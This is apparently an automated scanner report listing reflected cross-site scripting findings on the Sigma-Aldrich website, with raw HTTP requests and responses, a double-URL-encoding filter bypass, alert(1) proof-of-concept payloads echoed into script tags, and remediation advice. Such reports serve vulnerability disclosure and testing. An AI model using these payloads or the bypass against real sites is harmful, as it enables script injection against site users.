bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FN5%3DAll%26N3%3Dmode%2Bmatchpartialmax%26N4%3D%2560%26D7%3D0%26D10%3D%2560%26N1%3DS_ID%26ST%3DRS%26N25%3D0%26F%3DPR%22%2C%22t%22%3A1289930591511%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22l%22%3A%22Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20Results%22%2C%22nw%22%3A784%2C%22nl%22%3A92%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:09 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28927


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/technical-service-home/86339";alert(1)//d6e5fce1c43","E404") ;
   </script>
...[SNIP]...

1.640. http://www.sigmaaldrich.com/united-states.html [REST URL parameter 1]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /united-states.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f07d5%2522%253balert%25281%2529%252f%252fd86fe3897ff was submitted in the REST URL parameter 1. This input was echoed as f07d5";alert(1)//d86fe3897ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /f07d5%2522%253balert%25281%2529%252f%252fd86fe3897ff HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:57 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28904


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/f07d5";alert(1)//d86fe3897ff","E404") ;
   </script>
...[SNIP]...

Report generated by XSS.CX at Tue Nov 16 12:08:37 CST 2010.